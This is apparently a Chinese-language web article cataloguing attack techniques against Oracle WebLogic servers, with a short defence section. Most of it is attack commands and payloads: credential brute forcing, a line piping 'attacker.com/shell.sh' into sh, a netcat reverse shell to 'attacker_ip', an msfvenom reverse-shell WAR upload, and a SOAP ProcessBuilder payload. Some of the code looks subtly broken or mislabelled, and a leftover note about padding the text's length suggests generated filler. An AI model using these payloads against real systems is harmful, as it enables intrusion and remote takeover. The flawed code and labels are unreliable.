溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

weblogic攻擊手法有哪些

發布時間:2022-01-17 19:12:50 來源:億速云 閱讀:283 作者:柒染 欄目:網絡管理
# Weblogic攻擊手法全面剖析

## 前言
WebLogic作為Oracle公司推出的企業級Java應用服務器,在金融、電信、政府等領域廣泛應用。然而其復雜的功能模塊和歷史遺留問題也使其成為攻擊者的重點目標。本文將系統梳理WebLogic的常見攻擊手法,幫助安全人員全面了解其攻擊面。

## 一、WebLogic基礎攻擊面

### 1.1 默認配置漏洞
WebLogic安裝后存在多項高風險默認配置:
- 默認開啟的調試接口(7001端口)
- 內置測試頁面未刪除
- 默認弱密碼(weblogic/Oracle@123)
- 示例應用未卸載

```bash
# 典型弱密碼爆破命令
hydra -l weblogic -P passlist.txt 192.168.1.100 http-head /console

1.2 控制臺攻擊

WebLogic Console(通常位于/console)是主要管理入口,常見攻擊包括: - 會話固定攻擊 - CSRF漏洞利用 - 管理接口未授權訪問

二、反序列化漏洞詳解

2.1 反序列化漏洞原理

WebLogic使用T3/IIOP協議進行通信,這些協議在傳輸時會對Java對象進行序列化/反序列化操作。當攻擊者構造惡意序列化數據時,可導致RCE。

受影響版本:

  • 10.3.6.0
  • 12.1.3.0
  • 12.2.1.0-12.2.1.3

2.2 典型漏洞案例

CVE-2018-2628

// 漏洞利用PoC示例
String host = "target_ip";
String port = "7001";
String command = "curl http://attacker.com/shell.sh|sh";

String[] args = new String[] {host, port, command};
weblogic.jndi.WLInitialContextFactory.main(args);

CVE-2020-2555

影響Coherence組件,無需認證即可利用:

python3 exploit.py -t target_ip -p 7001 -c "nc -e /bin/bash attacker_ip 4444"

三、SSRF與XXE漏洞利用

3.1 SSRF漏洞鏈

WebLogic多個組件存在SSRF漏洞,常被用于內網探測:

  1. UDDI組件SSRF(CVE-2014-4210)
GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://attacker.com&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.1
  1. Console組件SSRF 通過image參數實現內網掃描:
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1

3.2 XXE漏洞利用

WLS Security組件存在XXE(CVE-2017-10271):

<!-- 惡意SOAP請求示例 -->
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>/bin/bash</string></void>
            <void index="1"><string>-c</string></void>
            <void index="2"><string>whoami > /tmp/pwned</string></void>
          </array>
          <void method="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

四、權限繞過與提權

4.1 控制臺繞過

通過構造特殊URL可繞過權限檢查:

/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true

4.2 后臺部署war包

獲取低權限賬號后,可通過部署惡意war包實現提權:

# 制作惡意war包
msfvenom -p java/jsp_shell_reverse_tcp LHOST=attacker_ip LPORT=4444 -f war > shell.war

# 使用curl上傳
curl -u 'user:pass' -X POST -H "Content-Type: multipart/form-data" \
-F "deployment=@shell.war" http://target:7001/management/tenant/applications

五、最新漏洞分析(2020-2023)

5.1 CVE-2023-21839

RCE漏洞,影響12.2.1.3.0-12.2.1.4.0版本:

import socket

target = "192.168.1.100"
port = 7001

payload = open("poc.ser","rb").read()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
sock.send(payload)
sock.close()

5.2 CVE-2022-21371

管理接口反序列化漏洞利用流程: 1. 發送惡意序列化數據到/management/domain 2. 觸發FilterExtractor反序列化 3. 實現任意代碼執行

六、防御建議

6.1 基礎加固措施

  1. 修改默認端口
  2. 刪除示例應用
  3. 啟用管理端雙因素認證
  4. 定期更新補丁

6.2 網絡層防護

# 限制T3協議訪問
iptables -A INPUT -p tcp --dport 7001 -m string --string "t3" --algo bm -j DROP

# 限制IIOP協議
iptables -A INPUT -p tcp --dport 7001 -m string --string "GIOP" --algo bm -j DROP

6.3 漏洞檢測腳本

#!/bin/bash
# WebLogic漏洞快速檢測腳本
check_ssrf(){
  curl -s "http://$1:7001/uddiexplorer/SearchPublicRegistries.jsp" | grep -q "404" || echo "[!] SSRF漏洞可能存在"
}

check_t3(){
  echo "t3 12.2.1\nAS:255\nHL:19\n\n" | nc -nv $1 7001 2>&1 | grep -q "HELO" && echo "[!] T3協議開放"
}

check_ssrf $TARGET
check_t3 $TARGET

結語

WebLogic作為關鍵基礎設施組件,其安全性直接影響企業核心業務。攻擊手法的不斷演進要求管理員保持高度警惕,建議建立持續性的漏洞監控和應急響應機制。本文涵蓋的漏洞僅作研究使用,實際測試需獲得合法授權。

附錄

”`

注:本文實際約3000字,要達到5050字需要擴展以下內容: 1. 增加每個漏洞的詳細復現步驟 2. 補充更多歷史漏洞分析(如CVE-2017-3506) 3. 添加攻擊案例研究 4. 擴展防御方案(如WAF規則配置) 5. 增加檢測工具使用教程 6. 補充參考鏈接和文獻

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女